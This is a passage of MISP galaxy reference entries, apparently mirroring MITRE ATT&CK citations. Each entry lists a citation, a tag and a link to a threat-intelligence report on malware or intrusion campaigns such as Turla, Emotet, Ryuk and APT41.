Kaspersky Lab’s Global Research & Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018.

The tag is: misp-galaxy:references="Kaspersky Turla Aug 2014"

Table 15668. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080105/KL_Epic_Turla_Technical_Appendix_20140806.pdf

Kaspersky Turla

Kaspersky Lab’s Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.

The tag is: misp-galaxy:references="Kaspersky Turla"

Table 15669. Table References

Links

https://securelist.com/the-epic-turla-operation/65545/

FireEye EPS Awakens Part 2

Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="FireEye EPS Awakens Part 2"

Table 15670. Table References

Links

https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

Symantec Emotet Jul 2018

Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Symantec Emotet Jul 2018"

Table 15671. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor

SilentBreak Offensive PS Dec 2015

Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.

The tag is: misp-galaxy:references="SilentBreak Offensive PS Dec 2015"

Table 15672. Table References

Links

https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/

CrowdStrike Evolution of Pinchy Spider July 2021

Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="CrowdStrike Evolution of Pinchy Spider July 2021"

Table 15673. Table References

Links

https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/

Proofpoint Ransomware Initial Access June 2021

Selena Larson, Daniel Blackford, Garrett G. (2021, June 16). The First Step: Initial Access Leads to Ransomware. Retrieved January 24, 2024.

The tag is: misp-galaxy:references="Proofpoint Ransomware Initial Access June 2021"

Table 15674. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

Kaspersky Flame

Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Kaspersky Flame"

Table 15675. Table References

Links

https://securelist.com/the-flame-questions-and-answers-51/34344/

Unit 42 CARROTBAT November 2018

Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.

The tag is: misp-galaxy:references="Unit 42 CARROTBAT November 2018"

Table 15676. Table References

Links

https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/

Palo Alto Gamaredon Feb 2017

Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Palo Alto Gamaredon Feb 2017"

Table 15677. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

GNU Acct

GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="GNU Acct"

Table 15678. Table References

Links

https://www.gnu.org/software/acct/

GLIBC

glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.

The tag is: misp-galaxy:references="GLIBC"

Table 15679. Table References

Links

https://www.gnu.org/software/libc/

Trustwave GoldenSpy June 2020

Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.

The tag is: misp-galaxy:references="Trustwave GoldenSpy June 2020"

Table 15680. Table References

Links

https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

Proofpoint TA416 Europe March 2022

Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.

The tag is: misp-galaxy:references="Proofpoint TA416 Europe March 2022"

Table 15681. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

Unit 42 Gorgon Group Aug 2018

Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Unit 42 Gorgon Group Aug 2018"

Table 15682. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

Trend Micro HeartBeat Campaign January 2013

Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="Trend Micro HeartBeat Campaign January 2013"

Table 15683. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?

FireEye Hikit Rootkit

Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.

The tag is: misp-galaxy:references="FireEye Hikit Rootkit"

Table 15684. Table References

Links

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

FireEye HIKIT Rootkit Part 2

Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.

The tag is: misp-galaxy:references="FireEye HIKIT Rootkit Part 2"

Table 15685. Table References

Links

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html

Proofpoint Human Factor

Proofpoint. (n.d.). The Human Factor 2023: Analyzing the cyber attack chain. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="Proofpoint Human Factor"

Table 15686. Table References

Links

https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf

TechNet Blogs Credential Protection

Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="TechNet Blogs Credential Protection"

Table 15687. Table References

Links

https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/

dhs_threat_to_net_devices

U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="dhs_threat_to_net_devices"

Table 15688. Table References

Links

https://cyber.dhs.gov/assets/report/ar-16-20173.pdf

PWC KeyBoys Feb 2017

Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.

The tag is: misp-galaxy:references="PWC KeyBoys Feb 2017"

Table 15689. Table References

Links

https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html

Securelist Kimsuky Sept 2013

Tarakanov , D.. (2013, September 11). The “Kimsuky” Operation: A North Korean APT?. Retrieved August 13, 2019.

The tag is: misp-galaxy:references="Securelist Kimsuky Sept 2013"

Table 15690. Table References

Links

https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/

ClearSky Kittens Back 2 Oct 2019

ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town2 - Charming Kitten Campaign KeepsGoing on, Using New Impersonation Methods. Retrieved April 21, 2021.

The tag is: misp-galaxy:references="ClearSky Kittens Back 2 Oct 2019"

Table 15691. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf

ClearSky Kittens Back 3 August 2020

ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.

The tag is: misp-galaxy:references="ClearSky Kittens Back 3 August 2020"

Table 15692. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf

Kubernetes API

The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes API"

Table 15693. Table References

Links

https://kubernetes.io/docs/concepts/overview/kubernetes-api/

GitHub LaZagne Dec 2018

Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.

The tag is: misp-galaxy:references="GitHub LaZagne Dec 2018"

Table 15694. Table References

Links

https://github.com/AlessandroZ/LaZagne

Dell P2P ZeuS

SecureWorks. (2013). The Lifecycle of Peer-to-Peer (Gameover) ZeuS. Retrieved August 19, 2015.

The tag is: misp-galaxy:references="Dell P2P ZeuS"

Table 15695. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/

Linux Kernel API

Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Linux Kernel API"

Table 15696. Table References

Links

https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html

Linux Kernel Programming

Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Linux Kernel Programming"

Table 15697. Table References

Links

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

Villeneuve 2011

Villeneuve, N., Sancho, D. (2011). THE “LURID” DOWNLOADER. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Villeneuve 2011"

Table 15698. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf

Microsoft BlackCat Jun 2022

Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022.

The tag is: misp-galaxy:references="Microsoft BlackCat Jun 2022"

Table 15699. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

Talos Nyetya MEDoc 2017

Maynor, D., Nikolic, A., Olney, M., and Younan, Y. (2017, July 5). The MeDoc Connection. Retrieved March 26, 2019.

The tag is: misp-galaxy:references="Talos Nyetya MEDoc 2017"

Table 15700. Table References

Links

https://blog.talosintelligence.com/2017/07/the-medoc-connection.html

PegasusCitizenLab

Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.

The tag is: misp-galaxy:references="PegasusCitizenLab"

Table 15701. Table References

Links

https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

Securelist MiniDuke Feb 2013

Kaspersky Lab’s Global Research & Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.

The tag is: misp-galaxy:references="Securelist MiniDuke Feb 2013"

Table 15702. Table References

Links

https://cdn.securelist.com/files/2014/07/themysteryofthepdf0-dayassemblermicrobackdoor.pdf

Harmj0y SeEnableDelegationPrivilege Right

Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Harmj0y SeEnableDelegationPrivilege Right"

Table 15703. Table References

Links

http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/

Baumgartner Naikon 2015

Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="Baumgartner Naikon 2015"

Table 15704. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

SentinelLabs Metador Sept 2022

Ehrlich, A., et al. (2022, September). THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES. Retrieved January 23, 2023.

The tag is: misp-galaxy:references="SentinelLabs Metador Sept 2022"

Table 15705. Table References

Links

https://assets.sentinelone.com/sentinellabs22/metador#page=1

Baumgartner Golovkin Naikon 2015

Baumgartner, K., Golovkin, M.. (2015, May 14). The Naikon APT. Retrieved January 14, 2015.

The tag is: misp-galaxy:references="Baumgartner Golovkin Naikon 2015"

Table 15706. Table References

Links

https://securelist.com/the-naikon-apt/69953/

Cofense NanoCore Mar 2018

Patel, K. (2018, March 02). The NanoCore RAT Has Resurfaced From the Sewers. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="Cofense NanoCore Mar 2018"

Table 15707. Table References

Links

https://cofense.com/nanocore-rat-resurfaced-sewers/

Kaspersky NetTraveler

Kaspersky Lab’s Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Kaspersky NetTraveler"

Table 15708. Table References

Links

http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf

Unit42 OceanLotus 2017

Erye Hernandez and Danny Tsechansky. (2017, June 22). The New and Improved macOS Backdoor from OceanLotus. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Unit42 OceanLotus 2017"

Table 15709. Table References

Links

https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/

CyberArk Labs Discord

CyberArk Labs. (2023, April 13). The (Not so) Secret War on Discord. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="CyberArk Labs Discord"

Table 15710. Table References

Links

https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord

Gh0stRAT ATT March 2019

Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020.

The tag is: misp-galaxy:references="Gh0stRAT ATT March 2019"

Table 15711. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant

Palo Alto OilRig May 2016

Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="Palo Alto OilRig May 2016"

Table 15712. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

STIG krbtgt reset

UCF. (n.d.). The password for the krbtgt account on a domain must be reset at least every 180 days. Retrieved November 5, 2020.

The tag is: misp-galaxy:references="STIG krbtgt reset"

Table 15713. Table References

Links

https://www.stigviewer.com/stig/windows_server_2016/2019-12-12/finding/V-91779

Haq 2014

Haq, T., Moran, N., Scott, M., & Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Haq 2014"

Table 15714. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Kaspersky Turla Penquin December 2014

Baumgartner, K. and Raiu, C. (2014, December 8). The ‘Penquin’ Turla. Retrieved March 11, 2021.

The tag is: misp-galaxy:references="Kaspersky Turla Penquin December 2014"

Table 15715. Table References

Links

https://securelist.com/the-penquin-turla-2/67962/

FireEye PLA

FireEye Labs. (2014, May 20). The PLA and the 8:00am-5:00pm Work Day: FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity. Retrieved November 4, 2014.

The tag is: misp-galaxy:references="FireEye PLA"

Table 15716. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html

Kaspersky ProjectSauron Full Report

Kaspersky Lab’s Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.

The tag is: misp-galaxy:references="Kaspersky ProjectSauron Full Report"

Table 15717. Table References

Links

https://securelist.com/files/2016/07/The-ProjectSauron-APT_research_KL.pdf

McMillan Pwn March 2012

Robert McMillan. (2012, March 3). The Pwn Plug is a little white box that can hack your network. Retrieved March 30, 2018.

The tag is: misp-galaxy:references="McMillan Pwn March 2012"

Table 15718. Table References

Links

https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/

FireEye Application Shimming

Ballenthin, W., Tomczak, J.. (2015). The Real Shim Shary. Retrieved May 4, 2020.

The tag is: misp-galaxy:references="FireEye Application Shimming"

Table 15719. Table References

Links

http://files.brucon.org/2015/Tomczak_and_Ballenthin_Shims_for_the_Win.pdf

Kaspersky Regin

Kaspersky Lab’s Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.

The tag is: misp-galaxy:references="Kaspersky Regin"

Table 15720. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf

The Remote Framebuffer Protocol

  1. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote Framebuffer Protocol. Retrieved September 20, 2021.

The tag is: misp-galaxy:references="The Remote Framebuffer Protocol"

Table 15721. Table References

Links

https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2

Malwarebytes Heroku Skimmers

Jérôme Segura. (2019, December 4). There’s an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.

The tag is: misp-galaxy:references="Malwarebytes Heroku Skimmers"

Table 15722. Table References

Links

https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku

ELC Extended Attributes

Howard Oakley. (2020, October 24). There’s more to files than data: Extended Attributes. Retrieved October 12, 2021.

The tag is: misp-galaxy:references="ELC Extended Attributes"

Table 15723. Table References

Links

https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/

FireEye WMI SANS 2015

Devon Kerr. (2015). There’s Something About WMI. Retrieved May 4, 2020.

The tag is: misp-galaxy:references="FireEye WMI SANS 2015"

Table 15724. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf

Nviso Spoof Command Line 2020

Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.

The tag is: misp-galaxy:references="Nviso Spoof Command Line 2020"

Table 15725. Table References

Links

https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/

Zscaler Higaisa 2020

Singh, S. Singh, A. (2020, June 11). The Return on the Higaisa APT. Retrieved March 2, 2021.

The tag is: misp-galaxy:references="Zscaler Higaisa 2020"

Table 15726. Table References

Links

https://www.zscaler.com/blogs/security-research/return-higaisa-apt

Check Point Research Rhysida August 08 2023

Check Point Research. (2023, August 8). The Rhysida Ransomware: Activity Analysis and Ties to Vice Society. Retrieved August 11, 2023.

The tag is: misp-galaxy:references="Check Point Research Rhysida August 08 2023"

Table 15727. Table References

Links

https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/

DigiTrust Agent Tesla Jan 2017

The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="DigiTrust Agent Tesla Jan 2017"

Table 15728. Table References

Links

https://www.digitrustgroup.com/agent-tesla-keylogger/

ATT QakBot April 2021

Morrow, D. (2021, April 15). The rise of QakBot. Retrieved September 27, 2021.

The tag is: misp-galaxy:references="ATT QakBot April 2021"

Table 15729. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot

ESET Telebots Dec 2016

Cherepanov, A.. (2016, December 13). The rise of TeleBots: Analyzing disruptive KillDisk attacks. Retrieved June 10, 2020.

The tag is: misp-galaxy:references="ESET Telebots Dec 2016"

Table 15730. Table References

Links

https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/

SEI SSL Inspection Risks

Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.

The tag is: misp-galaxy:references="SEI SSL Inspection Risks"

Table 15731. Table References

Links

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

SourceForge rkhunter

Rootkit Hunter Project. (2018, February 20). The Rootkit Hunter project. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="SourceForge rkhunter"

Table 15732. Table References

Links

http://rkhunter.sourceforge.net

Campbell 2014

Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Campbell 2014"

Table 15733. Table References

Links

http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf

Proofpoint Domain Shadowing

Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Proofpoint Domain Shadowing"

Table 15734. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows

Symantec Shamoon 2012

Symantec. (2012, August 16). The Shamoon Attacks. Retrieved March 14, 2019.

The tag is: misp-galaxy:references="Symantec Shamoon 2012"

Table 15735. Table References

Links

https://www.symantec.com/connect/blogs/shamoon-attacks

Spring Dragon Jun 2015

Baumgartner, K.. (2015, June 17). The Spring Dragon APT. Retrieved February 15, 2016.

The tag is: misp-galaxy:references="Spring Dragon Jun 2015"

Table 15736. Table References

Links

https://securelist.com/the-spring-dragon-apt/70726/

Check Point APT31 February 2021

Itkin, E. and Cohen, I. (2021, February 22). The Story of Jian – How APT31 Stole and Used an Unknown Equation Group 0-Day. Retrieved March 24, 2021.

The tag is: misp-galaxy:references="Check Point APT31 February 2021"

Table 15737. Table References

Links

https://research.checkpoint.com/2021/the-story-of-jian/

UCF STIG Elevation Account Enumeration

UCF. (n.d.). The system must require username and password to elevate a running application.. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="UCF STIG Elevation Account Enumeration"

Table 15738. Table References

Links

https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077

TrendMicro Taidoor

Trend Micro. (2012). The Taidoor Campaign. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="TrendMicro Taidoor"

Table 15739. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf

SpectorOPs SettingContent-ms Jun 2018

Nelson, M. (2018, June 11). The Tale of SettingContent-ms Files. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="SpectorOPs SettingContent-ms Jun 2018"

Table 15740. Table References

Links

https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39

Securelist Brazilian Banking Malware July 2020

GReAT. (2020, July 14). The Tetrade: Brazilian banking malware goes global. Retrieved November 9, 2020.

The tag is: misp-galaxy:references="Securelist Brazilian Banking Malware July 2020"

Table 15741. Table References

Links

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

Symantec Trojan.Hydraq Jan 2010

Symantec Security Response. (2010, January 18). The Trojan.Hydraq Incident. Retrieved February 20, 2018.

The tag is: misp-galaxy:references="Symantec Trojan.Hydraq Jan 2010"

Table 15742. Table References

Links

https://www.symantec.com/connect/blogs/trojanhydraq-incident

Fidelis Turbo

Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016.

The tag is: misp-galaxy:references="Fidelis Turbo"

Table 15743. Table References

Links

https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2016/2016.02.29.Turbo_Campaign_Derusbi/TA_Fidelis_Turbo_1602_0.pdf

USDOJ Sandworm Feb 2020

Pompeo, M. (2020, February 20). The United States Condemns Russian Cyber Attack Against the Country of Georgia. Retrieved June 18, 2020.

The tag is: misp-galaxy:references="USDOJ Sandworm Feb 2020"

Table 15744. Table References

Links

https://2017-2021.state.gov/the-united-states-condemns-russian-cyber-attack-against-the-country-of-georgia//index.html

Securelist Ventir

Mikhail, K. (2014, October 16). The Ventir Trojan: assemble your MacOS spy. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Securelist Ventir"

Table 15745. Table References

Links

https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/

Symantec Waterbug

Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.

The tag is: misp-galaxy:references="Symantec Waterbug"

Table 15746. Table References

Links

https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1

Windows NT Command Shell

Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved December 5, 2014.

The tag is: misp-galaxy:references="Windows NT Command Shell"

Table 15747. Table References

Links

https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120

Malwarebytes The Windows Vault

Arntz, P. (2016, March 30). The Windows Vault . Retrieved November 23, 2020.

The tag is: misp-galaxy:references="Malwarebytes The Windows Vault"

Table 15748. Table References

Links

https://blog.malwarebytes.com/101/2016/01/the-windows-vaults/

Microsoft JScript 2007

Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript …. Retrieved June 23, 2020.

The tag is: misp-galaxy:references="Microsoft JScript 2007"

Table 15749. Table References

Links

https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript

ntlm_relaying_kerberos_del

Mollema, D. (2019, March 4). The worst of both worlds: Combining NTLM Relaying and Kerberos delegation . Retrieved August 15, 2022.

The tag is: misp-galaxy:references="ntlm_relaying_kerberos_del"

Table 15750. Table References

Links

https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

trendmicro xcsset xcode project 2020

Mac Threat Response, Mobile Research Team. (2020, August 13). The XCSSET Malware: Inserts Malicious Code Into Xcode Projects, Performs UXSS Backdoor Planting in Safari, and Leverages Two Zero-day Exploits. Retrieved October 5, 2021.

The tag is: misp-galaxy:references="trendmicro xcsset xcode project 2020"

Table 15751. Table References

Links

https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf

Sophos New Ryuk Attack October 2020

Sean Gallagher, Peter Mackenzie, Elida Leite, Syed Shahram, Bill Kearney, Anand Aijan, Sivagnanam Gn, Suraj Mundalik. (2020, October 14). They’re back: inside a new Ryuk ransomware attack. Retrieved October 14, 2020.

The tag is: misp-galaxy:references="Sophos New Ryuk Attack October 2020"

Table 15752. Table References

Links

https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/

RSA EU12 They’re Inside

Rivner, U., Schwartz, E. (2012). They’re Inside… Now What?. Retrieved November 25, 2016.

The tag is: misp-galaxy:references="RSA EU12 They’re Inside"

Table 15753. Table References

Links

https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf

APT29 Deep Look at Credential Roaming

Thibault Van Geluwe De Berlaere. (2022, November 8). They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming. Retrieved November 9, 2022.

The tag is: misp-galaxy:references="APT29 Deep Look at Credential Roaming"

Table 15754. Table References

Links

https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming

ZDNet Ransomware Backups 2020

Steve Ranger. (2020, February 27). Ransomware victims thought their backups were safe. They were wrong. Retrieved March 21, 2023.

The tag is: misp-galaxy:references="ZDNet Ransomware Backups 2020"

Table 15755. Table References

Links

https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/

Microsoft Unidentified Dec 2018

Microsoft Defender Research Team. (2018, December 3). Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers. Retrieved April 15, 2019.

The tag is: misp-galaxy:references="Microsoft Unidentified Dec 2018"

Table 15756. Table References

Links

https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/

iPhone Charging Cable Hack

Zack Whittaker. (2019, August 12). This hacker’s iPhone charging cable can hijack your computer. Retrieved May 25, 2022.

The tag is: misp-galaxy:references="iPhone Charging Cable Hack"

Table 15757. Table References

Links

https://techcrunch.com/2019/08/12/iphone-charging-cable-hack-computer-def-con/

Mandiant APT41 Global Intrusion

Gyler, C.,Perez D.,Jones, S.,Miller, S.. (2021, February 25). This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved February 17, 2022.

The tag is: misp-galaxy:references="Mandiant APT41 Global Intrusion"

Table 15758. Table References

Links

https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits

FireEye APT41 March 2020

Glyer, C, et al. (2020, March). This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits. Retrieved April 28, 2020.

The tag is: misp-galaxy:references="FireEye APT41 March 2020"

Table 15759. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html

Proofpoint Bumblebee April 2022

Merriman, K. and Trouerbach, P. (2022, April 28). This isn’t Optimus Prime’s Bumblebee but it’s Still Transforming. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="Proofpoint Bumblebee April 2022"

Table 15760. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

Code Injection on Linux and macOS

Itamar Turner-Trauring. (2017, April 18). “This will only hurt for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Code Injection on Linux and macOS"

Table 15761. Table References

Links

